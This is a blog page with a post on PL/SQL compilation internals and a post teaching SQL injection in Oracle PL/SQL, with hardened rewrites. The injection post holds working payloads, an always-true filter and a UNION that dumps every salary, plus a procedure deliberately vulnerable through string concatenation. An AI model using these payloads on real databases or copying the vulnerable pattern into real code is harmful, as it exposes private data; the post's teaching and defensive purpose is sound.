Showing posts with label Sql.

Sep 21, 2012

PLSQL Compiler



SQL compilation means generating an execution plan.
PL/SQL compilation means generating P-code, the instruction stream of the PL/SQL Virtual Machine.
-------------------------------------------------------------------------------------------------

The Front-end:
--------------
If the compiler front-end finds any error, it outputs an error report and compilation of the unit is aborted. The output of the front-end is an internal representation that exactly captures the semantics of the source code. The PL/SQL compiler uses DIANA (Descriptive Intermediate Attributed Notation for Ada) for this internal representation. The front-end guarantees that when it does not report an error, the DIANA it generates is correct and needs no further correctness checking.

DIANA:
-------
DIANA is an abstract data type such that each object of the type is a representation of an intermediate form of an Ada program. Oracle adapted it as the intermediate form for PL/SQL, which is itself modelled on Ada.

The Back-end (Code-Generator):
-------------------------------
The back-end takes DIANA as input and generates an executable representation of the program for its target machine. For PL/SQL in the default (interpreted) mode that target is not the host CPU but the PL/SQL Virtual Machine, so the output is P-code, the instruction stream of the PVM. The back-end plays a critical role in generating fast run-time code.

PL/SQL Virtual Machine:
-----------------------
The instruction set of the PVM is exactly analogous to that of a computer chip. The difference, of course, is that the PVM is implemented in software (it is written in C and linked into the Oracle executable), while the instruction set of a chip is implemented directly in hardware. A computer implemented in software is commonly called a virtual machine, and every interpreted language has such a machine.

Native Compilation of PL/SQL:
-----------------------------

In native mode the compiler does not hand the P-code to the PVM interpreter. Instead it translates the P-code (not host machine code, as it is sometimes described) into C source code with the same semantics; a C compiler then builds that into a shared library which the server loads and calls directly, removing the interpreter from the execution path.
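The two stages described above can be observed from SQL*Plus. The following is an added example, not code from the original post or from Finnigan's presentation: it shows a front-end error report landing in USER_ERRORS (and aborting the unit), and the back-end's output form being switched between interpreted P-code and native code with the PLSQL_CODE_TYPE compiler parameter. The procedure names DEMO_BAD and DEMO_OK are this example's own.

```sql
-- Added example, not from the original post. Procedure names are invented.

-- 1. Front-end: a semantic error (undeclared identifier) stops compilation.
--    The unit is created INVALID and the report is kept in USER_ERRORS.
CREATE OR REPLACE PROCEDURE DEMO_BAD AS
BEGIN
  V_UNDECLARED := 1;   -- PLS-00201: identifier 'V_UNDECLARED' must be declared
END;
/
SELECT LINE, POSITION, TEXT
  FROM USER_ERRORS
 WHERE NAME = 'DEMO_BAD' AND TYPE = 'PROCEDURE'
 ORDER BY SEQUENCE;

-- 2. Back-end: a clean unit compiled first to P-code for the PVM, then natively.
CREATE OR REPLACE PROCEDURE DEMO_OK AS
BEGIN
  NULL;
END;
/
ALTER PROCEDURE DEMO_OK COMPILE PLSQL_CODE_TYPE = INTERPRETED;
ALTER PROCEDURE DEMO_OK COMPILE PLSQL_CODE_TYPE = NATIVE;

-- Which form the back-end produced is recorded per unit.
SELECT NAME, PLSQL_CODE_TYPE, PLSQL_OPTIMIZE_LEVEL
  FROM USER_PLSQL_OBJECT_SETTINGS
 WHERE NAME IN ('DEMO_OK', 'DEMO_BAD');
```

On 10g the NATIVE step only succeeds if a C compiler has been configured for the database, since the server has to build the generated C; from 11g the compiler emits machine code itself and no external compiler is involved.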

For more details see Finnigan's Black Hat USA 2006 presentation:

http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Finnigan.pdf

Mar 15, 2011

Impact of SQL Injection

   Retrieval of crucial data
   Data manipulation
   Altering database state
   Denial of database service


Developers are often unaware that the query above, which splices user input straight into the statement text, can be misused to the extent of listing login names and passwords, information that is crucial to an organization. An attacker can supply input such as
Code :

p'or upper(s_empname) like'%
p'or'p'='p

The second input closes the literal the developer opened and appends a condition that is always true, so a filter of the form USERNAME = '<input>' collapses to "match every row":
Code sql:

SELECT USERNAME, PASSWORD FROM USERS
WHERE USERNAME = 'p' OR 'p'='p'   -- always true, equivalent to OR 1=1

SQL Injection: Example

A procedure P_GET_SAL was created to return the salary of the employee whose name is passed in. The statement is built by concatenating that name into the SQL text, which is the root of the problem:

Code sql:

CREATE OR REPLACE PROCEDURE P_GET_SAL (P_ENAME VARCHAR2 DEFAULT NULL)
AS
  CUR     SYS_REFCURSOR;
  V_STMT  VARCHAR2(4000);   -- missing from the original listing
  V_ENAME VARCHAR2(100);
  V_SAL   NUMBER;
BEGIN
  -- Vulnerable on purpose: P_ENAME becomes part of the SQL text.
  V_STMT := 'SELECT ENAME, SALARY FROM EMPLOYEE WHERE ENAME = ''' || P_ENAME || '''';
  DBMS_OUTPUT.PUT_LINE(V_STMT);   -- echo the statement actually executed
  OPEN CUR FOR V_STMT;
  LOOP
    FETCH CUR INTO V_ENAME, V_SAL;
    EXIT WHEN CUR%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE('Employee ' || V_ENAME || ' draws ' || TO_CHAR(V_SAL));
  END LOOP;
  CLOSE CUR;
END;
/



Code sql:

SQL> SET SERVEROUTPUT ON
SQL> EXEC P_GET_SAL('KING');
SELECT ENAME, SALARY FROM EMPLOYEE WHERE ENAME = 'KING'
Employee KING draws 4500

PL/SQL procedure successfully completed.


Code sql:

SQL> EXEC P_GET_SAL('KING'' UNION SELECT ENAME, SALARY FROM EMPLOYEE WHERE ''1''=''1');
SELECT ENAME, SALARY FROM EMPLOYEE WHERE ENAME = 'KING' UNION SELECT ENAME, SALARY FROM EMPLOYEE WHERE '1'='1'
Employee KING draws 4500
Employee ALLEN draws 1200
Employee MIKE draws 3400
Employee KATE draws 2300
Employee PAUL draws 6400
Employee TOMY draws 2700
Employee JENNY draws 6200
Employee JAKES draws 4600

PL/SQL procedure successfully completed.



Several strategies can be adopted to safeguard the SQL code and remove the impact of SQL injection in applications. Some of them are listed below.

1. Use static SQL wherever the statement shape is fixed; PL/SQL binds the variables for you and no statement text is built from input.
2. Use invoker's rights (AUTHID CURRENT_USER) so that whatever does get injected runs with the caller's privileges rather than the owner's; this limits the damage, it does not stop the injection.
3. Where dynamic SQL is unavoidable, pass values as bind arguments (OPEN ... FOR ... USING, EXECUTE IMMEDIATE ... USING) instead of concatenating them.
4. Validate and sanitize the parts that cannot be bound, such as object names, with DBMS_ASSERT.
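The four points above applied to the post's own procedure. This is an added example, not code from the original post: two hardened rewrites of P_GET_SAL against the post's EMPLOYEE(ENAME, SALARY) table. The procedure names P_GET_SAL_STATIC and P_GET_SAL_DYN and the P_TABLE parameter are this example's own.

```sql
-- Added example, not from the original post. Procedure names are invented.

-- 1. Static SQL with invoker's rights. PL/SQL binds P_ENAME itself; no
--    statement text is assembled, so there is nothing for input to break out of.
CREATE OR REPLACE PROCEDURE P_GET_SAL_STATIC (P_ENAME VARCHAR2)
AUTHID CURRENT_USER      -- runs with the caller's privileges, not the owner's
AS
BEGIN
  FOR R IN (SELECT ENAME, SALARY FROM EMPLOYEE WHERE ENAME = P_ENAME) LOOP
    DBMS_OUTPUT.PUT_LINE('Employee ' || R.ENAME || ' draws ' || TO_CHAR(R.SALARY));
  END LOOP;
END;
/

-- 2. Dynamic SQL is only justified when part of the statement is not a value,
--    here a table name. Identifiers cannot be bound, so the name is checked
--    with DBMS_ASSERT; the employee name is still passed as a bind argument.
CREATE OR REPLACE PROCEDURE P_GET_SAL_DYN (P_TABLE VARCHAR2, P_ENAME VARCHAR2)
AUTHID CURRENT_USER
AS
  CUR     SYS_REFCURSOR;
  V_STMT  VARCHAR2(4000);
  V_ENAME VARCHAR2(100);
  V_SAL   NUMBER;
BEGIN
  -- SQL_OBJECT_NAME raises ORA-44002 unless P_TABLE is a valid (optionally
  -- owner-qualified) name of an object the caller can see; quotes, spaces,
  -- UNION and the like never reach the statement text.
  V_STMT := 'SELECT ENAME, SALARY FROM '
            || DBMS_ASSERT.SQL_OBJECT_NAME(P_TABLE)
            || ' WHERE ENAME = :ename';
  OPEN CUR FOR V_STMT USING P_ENAME;   -- :ename is data, never SQL text
  LOOP
    FETCH CUR INTO V_ENAME, V_SAL;
    EXIT WHEN CUR%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE('Employee ' || V_ENAME || ' draws ' || TO_CHAR(V_SAL));
  END LOOP;
  CLOSE CUR;
END;
/

-- The post's payload is now compared, quotes and all, against ENAME and
-- matches nothing; a bad table name fails before any SQL is run.
SET SERVEROUTPUT ON
EXEC P_GET_SAL_STATIC('KING')
EXEC P_GET_SAL_DYN('EMPLOYEE', 'KING'' UNION SELECT ENAME, SALARY FROM EMPLOYEE WHERE ''1''=''1')
EXEC P_GET_SAL_DYN('EMPLOYEE WHERE 1=1 --', 'KING')   -- ORA-44002: invalid object name
```

Prefer the static form whenever the table and column list are known at compile time; reach for DBMS_ASSERT only for the identifier fragments that genuinely vary, and keep every data value on the USING side of the statement.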


-------